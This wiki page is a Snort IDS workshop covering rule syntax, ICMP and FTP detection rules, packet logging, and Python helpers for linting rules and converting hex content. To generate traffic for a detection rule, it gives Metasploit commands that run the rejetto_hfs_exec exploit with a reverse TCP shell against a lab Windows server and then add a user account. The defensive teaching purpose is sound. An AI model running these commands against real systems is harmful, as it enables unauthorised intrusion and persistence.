SNORT-RULES: Contoh Materi Workshop

From OnnoWiki
Latest revision as of 03:27, 6 December 2018

Source: http://resources.infosecinstitute.com/snort-rules-workshop-part-one/


Install SNORT

  • Build an Ubuntu server machine
  • Install SNORT
  • Check the Snort version

snort -V

Edit the configuration

  • Set the HOME_NET value

vi /etc/snort/snort.conf

  • Set HOME_NET (the ipvar HOME_NET line) to the network that will be monitored, normally written as a /24 such as 192.168.x.0/24. Every rule below uses $HOME_NET as the protected side, so a wrong value here silently stops those rules from matching.


Verify SNORT

Run the configuration test (-T parses snort.conf and the rule files, reports problems and exits; it does not inspect traffic). The examples assume the interface is enp0s3; substitute the name shown by ip link:

sudo snort -T -i enp0s3 -c /etc/snort/snort.conf

The output will include, for example,

0 Snort rules read

because local.rules is still empty at this point.

Creating a simple local.rules

Detecting ping

The simple test rule we will create produces an alert whenever Snort sees an ICMP packet (an Echo Request or an Echo Reply) directed at the protected network. Open local.rules in a text editor with the following command,

sudo nano /etc/snort/rules/local.rules

The file is most likely empty. Add the following line (as a single line, without a line break). Use straight ASCII double quotes; curly quotes pasted from a web page or word processor make Snort reject the rule:

alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)

Let us look at the syntax of this rule,

Rule Header

  • alert – Rule action. Snort will generate an alert when the set condition is met.
  • icmp – Protocol. The rule applies to ICMP packets only.
  • any – Source IP. Snort will look at all sources.
  • any – Source port. Snort will look at all ports (ICMP has no ports, but the field is still required).
  • -> – Direction. From source to destination.
  • $HOME_NET – Destination IP. We are using the HOME_NET value from the snort.conf file.
  • any – Destination port. Snort will look at all ports on the protected network.

Rule Options

  • msg:"ICMP test" – Snort will include this message with the alert.
  • sid:1000001 – Snort rule ID. Remember all numbers < 1,000,000 are reserved, this is why we are starting with 1000001 (you may use any number, as long as it's greater than 1,000,000).
  • rev:1 – Revision number. This option allows for easier rule maintenance.
  • classtype:icmp-event – Categorizes the rule as an "icmp-event", one of the predefined Snort categories. This option helps with rule organization.
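
As an added example (not part of the workshop and not Snort's own code), the following Python script applies the checks just listed to a local.rules body before snort -T is run: it parses the header and options of each rule, verifies that msg, sid and rev are present and that sid is above the reserved range, and flags the curly quotes that copy/paste from a web page introduces. The sample rules are constructed from the ones in this workshop, with two deliberately broken copies.

```python
import re

# Added example: a small linter for rules in local.rules (not Snort code).
# It checks the points made in the workshop: a 7-field header, a known
# action and protocol, msg/sid/rev present, sid >= 1000000 (lower SIDs are
# reserved) and straight ASCII quotes (curly quotes make Snort reject the
# rule with a parse error).

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
ACTIONS = {"alert", "log", "pass", "drop", "reject", "sdrop"}
PROTOS = {"tcp", "udp", "icmp", "ip"}
CURLY = "\u201c\u201d\u2018\u2019"          # the four typographic quotes
STRAIGHT = "\"\"''"                          # their ASCII replacements


def parse_options(opts):
    """Split 'msg:"a; b"; sid:1; rev:1;' into (keyword, value) pairs,
    ignoring semicolons that sit inside quoted values."""
    pairs, buf, in_quote = [], "", False
    for ch in opts:
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            key, _, val = buf.strip().partition(":")
            if key:
                pairs.append((key.strip(), val.strip()))
            buf = ""
        else:
            buf += ch
    key, _, val = buf.strip().partition(":")
    if key:
        pairs.append((key.strip(), val.strip()))
    return pairs


def lint_rule(rule):
    """Return the list of problems found in one rule line ([] means OK).
    Blank lines and comments are accepted as-is."""
    problems = []
    rule = rule.strip()
    if not rule or rule.startswith("#"):
        return problems
    if any(c in rule for c in CURLY):
        problems.append("curly quotes found; Snort needs straight ASCII quotes")
        rule = rule.translate(str.maketrans(CURLY, STRAIGHT))  # keep checking the rest
    m = HEADER_RE.match(rule)
    if not m:
        problems.append("header does not parse: expected "
                        "'action proto src sport -> dst dport (options;)'")
        return problems
    if m["action"] not in ACTIONS:
        problems.append(f"unknown action {m['action']!r}")
    if m["proto"] not in PROTOS:
        problems.append(f"unknown protocol {m['proto']!r}")
    opts = dict(parse_options(m["opts"]))
    if "msg" not in opts:
        problems.append("missing msg option")
    sid = opts.get("sid")
    if sid is None:
        problems.append("missing sid option")
    elif not sid.isdigit() or int(sid) < 1000000:
        problems.append(f"sid {sid} is in the reserved range (< 1000000)")
    if "rev" not in opts:
        problems.append("missing rev option")
    return problems


def lint_rules(text):
    """Lint a whole local.rules body; returns [(line number, problems)]
    for the lines that have problems."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        problems = lint_rule(line)
        if problems:
            findings.append((lineno, problems))
    return findings


# Constructed sample local.rules: the workshop's ICMP rule, a copy with
# curly quotes, a rule with a sid in the reserved range, and one missing rev.
SAMPLE_RULES = """\
# local.rules
alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)
alert icmp any any -> $HOME_NET any (msg:\u201cICMP test\u201d; sid:1000001; rev:1;)
alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:100; rev:1;)
alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)
"""

if __name__ == "__main__":
    for lineno, probs in lint_rules(SAMPLE_RULES):
        for p in probs:
            print(f"local.rules:{lineno}: {p}")
```

Run it against the real file with python3 lint.py < /etc/snort/rules/local.rules after replacing SAMPLE_RULES with sys.stdin.read(); it is a pre-check, not a replacement for snort -T, which is still the authority on what Snort accepts.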

Test Snort to check whether there is a problem, assuming the Ethernet interface is enp0s3:

sudo snort -T -i enp0s3 -c /etc/snort/snort.conf

Scrolling back through the output, you should now see 1 Snort rules read, the rule that was just added.

Run Snort in IDS mode and show alerts on the console:

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3

where

-c - tells Snort which configuration file to use
-i enp0s3 - tells Snort which interface to listen on
-A console - tells Snort to write alerts to standard output
-q - "quiet" mode, do not print the banner and status report

From another machine, ping the server on which Snort is running, for example

ping 192.168.x.x

An alert will appear on the screen every time the server receives a ping. Press Ctrl+C to stop Snort.

Detecting FTP

To learn more, create an additional rule. Edit

sudo vi /etc/snort/rules/local.rules

and add, for example,

alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002; rev:1;)

This detects TCP traffic to port 21 on the protected network. The rule has no content option, so every packet to the port raises an alert, starting with the SYN of the connection, before any login takes place. Run Snort with ASCII packet logging enabled:

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3 -K ascii

Try an FTP connection to the server (for example 192.168.x.x) from Kali Linux with

apt install ftp
ftp 192.168.x.x

The alerts will appear.

Check the logs. With -K ascii, Snort creates a directory under /var/log/snort named after the remote (non-HOME_NET) host and writes each logged session to a file named TCP:<source port>-<destination port>, so look for a file TCP:xxxxx-21 (21 is the FTP port). For example,

ls /var/log/snort
sudo ls /var/log/snort/192.168.x.x
sudo cat /var/log/snort/192.168.x.x/TCP:4561-21

Detecting FTP login failures

To detect a failed FTP login, edit

sudo vi /etc/snort/rules/local.rules

and add

alert tcp any any <> $HOME_NET 21 (msg:"FTP failed login"; content:"Login incorrect"; sid:1000003; rev:1;)

Note that $HOME_NET is defined in snort.conf. Two things decide whether this rule fires. First, the "530 Login incorrect." reply is sent by the server to the client, so the direction must allow server-to-client traffic: the bidirectional operator <> does that, and $HOME_NET 21 -> any any would be tighter still; a one-way any any -> $HOME_NET 21 header never sees the reply. Second, content is compared case-sensitively unless nocase; is added, and the text must match what your FTP daemon actually sends (vsftpd replies "530 Login incorrect."; check your own server's reply in the -K ascii log before relying on the string). Run Snort,

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3

Log in from Kali Linux with a wrong password and the alert appears.
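
To make the direction and case points concrete, here is an added Python example (not Snort code, not part of the workshop) that replays a constructed FTP login failure through several variants of the rule above. The addresses (HOME_NET 192.168.1.0/24, server 192.168.1.10, Kali client 10.0.0.5) and the vsftpd-style replies are assumptions made for the example.

```python
import ipaddress

# Added example (not Snort code): a minimal model of the rule header and
# the content option, used to replay one constructed FTP session through
# variants of the "FTP failed login" rule. Addresses are assumptions.

HOME_NET = ipaddress.ip_network("192.168.1.0/24")   # assumed $HOME_NET

# Constructed session: (src ip, src port, dst ip, dst port, payload).
# The client 10.0.0.5 is outside HOME_NET, the FTP server 192.168.1.10 inside.
SESSION = [
    ("10.0.0.5", 52114, "192.168.1.10", 21, b"USER alice\r\n"),
    ("192.168.1.10", 21, "10.0.0.5", 52114, b"331 Please specify the password.\r\n"),
    ("10.0.0.5", 52114, "192.168.1.10", 21, b"PASS wrong\r\n"),
    ("192.168.1.10", 21, "10.0.0.5", 52114, b"530 Login incorrect.\r\n"),
]


def addr_matches(spec, ip):
    """'any', '$HOME_NET' or a literal IP/CIDR, as written in a rule header."""
    if spec == "any":
        return True
    net = HOME_NET if spec == "$HOME_NET" else ipaddress.ip_network(spec, strict=False)
    return ipaddress.ip_address(ip) in net


def port_matches(spec, port):
    return spec == "any" or int(spec) == port


def header_matches(rule, pkt):
    """Apply the 'src sport dir dst dport' part of a rule to one packet.
    '->' is one-way; '<>' accepts the packet in either direction."""
    sip, sport, dip, dport, _ = pkt
    forward = (addr_matches(rule["src"], sip) and port_matches(rule["sport"], sport)
               and addr_matches(rule["dst"], dip) and port_matches(rule["dport"], dport))
    if rule["dir"] == "->":
        return forward
    backward = (addr_matches(rule["src"], dip) and port_matches(rule["sport"], dport)
                and addr_matches(rule["dst"], sip) and port_matches(rule["dport"], sport))
    return forward or backward


def content_matches(rule, payload):
    """The content option: a raw byte-string search, case-sensitive unless nocase."""
    needle, hay = rule["content"].encode(), payload
    if rule.get("nocase"):
        needle, hay = needle.lower(), hay.lower()
    return needle in hay


def run_rule(rule, packets):
    """Return the indexes of the packets that would raise this rule's alert."""
    return [i for i, pkt in enumerate(packets)
            if header_matches(rule, pkt) and content_matches(rule, pkt[4])]


# The workshop's rule: bidirectional, so the server's 530 reply is seen.
RULE_BIDIR = {"src": "any", "sport": "any", "dir": "<>", "dst": "$HOME_NET",
              "dport": "21", "content": "Login incorrect"}
# Same header as the "FTP connection attempt" rule: client -> server only.
RULE_TO_SERVER = dict(RULE_BIDIR, dir="->")
# Tightest form: the 530 reply only ever travels server -> client.
RULE_FROM_SERVER = {"src": "$HOME_NET", "sport": "21", "dir": "->", "dst": "any",
                    "dport": "any", "content": "Login incorrect"}
# Wrong case, with and without nocase.
RULE_LOWER = dict(RULE_FROM_SERVER, content="login incorrect")
RULE_LOWER_NOCASE = dict(RULE_LOWER, nocase=True)

if __name__ == "__main__":
    for name, rule in [("<> any -> HOME_NET 21", RULE_BIDIR),
                       ("-> HOME_NET 21", RULE_TO_SERVER),
                       ("HOME_NET 21 -> any", RULE_FROM_SERVER),
                       ("lowercase content", RULE_LOWER),
                       ("lowercase + nocase", RULE_LOWER_NOCASE)]:
        print(f"{name:24} alerts on packets {run_rule(rule, SESSION)}")
```

Only the variants that allow server-to-client traffic report packet 3 (the 530 reply); the one-way client-to-server header reports nothing, which is the mistake that makes a rule look "dead" even though the login failure happened. Real Snort also reassembles the TCP stream and normalizes the payload before content matching, which this model ignores.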

Snort as a Packet Logger

To study a new attack technique, we can run Snort as a packet logger, recording packets instead of alerting:

sudo snort -dev -q -l /var/log/snort -i enp0s3

-d dumps the application-layer data, -e the data-link headers and -v is verbose; -l writes the packets to /var/log/snort, by default in binary (pcap) format, which Wireshark can open.

Go to Kali Linux to attack, run

msfconsole

and run an exploit, for example,

use exploit/windows/http/rejetto_hfs_exec
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.x.x (Kali Linux IP address)
set RHOST 192.168.x.x (Windows server IP address)
set RPORT 8081
exploit

If it succeeds we get a shell; type

net user accountname P@ssword12 /ADD
cd \
mkdir yourname

Press Ctrl+C and answer y (or "yes") to close the shell session.

Then,

  • check /var/log/snort
  • open the capture file in Wireshark and select Edit > Find Packet
  • select Packet Bytes for the Search In criteria
  • search for the string: the username you created
  • when the packet is found, select Follow TCP Stream

Building a custom rule from logged traffic

Suppose we want Snort to alert every time it sees "C:\Users\Administrator\Desktop\hfs2.3b>", the prompt of the command shell returned by the exploit above. Edit local.rules and add the following (every backslash is doubled, because \ is the escape character inside content):

alert tcp $HOME_NET any -> any any (msg:"Command Shell Access"; content:"C:\\Users\\Administrator\\Desktop\\hfs2.3b"; sid:1000004; rev:1;)

The direction is $HOME_NET any -> any any because the prompt travels from the compromised Windows server inside the protected network to the attacker. Run Snort as an IDS

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3

Run the exploit again from Kali Linux and the alerts appear on the server.

Content does not have to be readable text. To build the content from the bytes captured in Wireshark on Kali Linux,

  • select the packet
  • in the middle (packet details) pane, right-click the Data entry and choose Copy > Bytes > Offset Hex
  • paste the hex into the rule in local.rules, remove the offsets, line breaks and any bytes you do not need, and enclose the remaining hex values in | on both sides, for example content:"|43 3a 5c 55 73 65 72 73|" for "C:\Users"; including the trailing 3e (the ">" of the prompt) makes the rule more specific than the text version above
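
The following added Python example (not part of the workshop, not Snort code) does the manual steps above mechanically: it strips the offset column from a Wireshark Copy > Bytes > Offset Hex dump, renders the bytes as a Snort |hex| content, renders text as an escaped content string, and decodes either form back to bytes so you can confirm that the pasted hex and the typed text mean the same thing. The dump is constructed for the shell prompt in the rule; it is not a capture from the lab.

```python
import re

# Added example (not Snort code): converting between Wireshark hex dumps,
# Snort text content (with \-escapes) and Snort |hex| content.

# Constructed Offset Hex dump of the 39-byte prompt
# C:\Users\Administrator\Desktop\hfs2.3b>  (format of Copy > Bytes > Offset Hex)
OFFSET_HEX_DUMP = """\
0000   43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73
0010   74 72 61 74 6f 72 5c 44 65 73 6b 74 6f 70 5c 68
0020   66 73 32 2e 33 62 3e
"""

OFFSET_RE = re.compile(r"^[0-9a-fA-F]{4,}$")   # 4+ hex digits: an offset, not a byte


def offset_hex_to_bytes(dump):
    """Drop the leading offset column of each line and join the byte values."""
    data = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if OFFSET_RE.match(tokens[0]):
            tokens = tokens[1:]
        data.extend(int(t, 16) for t in tokens)
    return bytes(data)


def bytes_to_snort_content(data):
    """Render bytes as a Snort hex content: |43 3a 5c ...|"""
    return "|" + " ".join(f"{b:02x}" for b in data) + "|"


def text_to_snort_content(text):
    """Render text as an escaped Snort content string. Backslash, double
    quote, semicolon and pipe have special meaning inside content and are
    escaped with a backslash; this is why the rule above doubles every \\."""
    return "".join("\\" + c if c in '\\";|' else c for c in text)


def snort_content_to_bytes(content):
    """Decode a content value (text with \\-escapes and |hex| sections) into
    the bytes Snort actually searches for."""
    out, i = bytearray(), 0
    while i < len(content):
        ch = content[i]
        if ch == "|":                       # hex section up to the closing |
            end = content.index("|", i + 1)
            out.extend(bytes.fromhex(content[i + 1:end]))
            i = end + 1
        elif ch == "\\":                    # escaped literal character
            out.append(ord(content[i + 1]))
            i += 2
        else:
            out.append(ord(ch))
            i += 1
    return bytes(out)


if __name__ == "__main__":
    raw = offset_hex_to_bytes(OFFSET_HEX_DUMP)
    hex_form = bytes_to_snort_content(raw)
    text_form = text_to_snort_content(raw.decode())
    print('content:"%s"' % text_form)
    print('content:"%s"' % hex_form)
    # Both forms decode to the same bytes; the hex form is what you paste
    # when the bytes are not printable (or when you want the exact prompt,
    # including the trailing 3e, rather than a prefix of it).
    assert snort_content_to_bytes(hex_form) == snort_content_to_bytes(text_form) == raw
```

Decoding both the text rule and the pasted hex with snort_content_to_bytes before saving local.rules catches the two usual mistakes at this step: an offset column left in the hex, and a backslash that was not doubled.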

References

  • http://resources.infosecinstitute.com/snort-rules-workshop-part-one/